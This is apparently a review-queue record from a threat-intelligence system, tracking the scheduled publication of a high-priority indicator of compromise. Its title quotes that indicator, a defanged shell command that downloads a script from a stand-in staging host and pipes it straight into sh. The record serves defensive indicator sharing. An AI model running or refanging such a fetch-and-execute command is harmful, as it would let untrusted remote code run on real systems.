{
  "age_ms": 17999991,
  "assignee": null,
  "band": "high",
  "claimed_at": null,
  "created_at": 1792288923009,
  "decided_at": null,
  "decided_by": null,
  "item_id": "rq_0df2b4e3440048666df8da0f",
  "kind": "ioc_publication",
  "note": "",
  "priority": 310,
  "score": 100,
  "sla_breached": false,
  "sla_due_at": 1792461723009,
  "sla_hours": 48,
  "snoozed_until": null,
  "status": "open",
  "subject": {
    "ioc_id": "ioc_e1b6ef4d11ffdcc323747f8c"
  },
  "tenant_id": "t1",
  "title": "Release cmdline indicator sh -c 'curl -s hxxp://stage2[.]example[.]invalid/m.sh | sh' after the public delay",
  "version": 0,
  "wording": "we assess as"
}
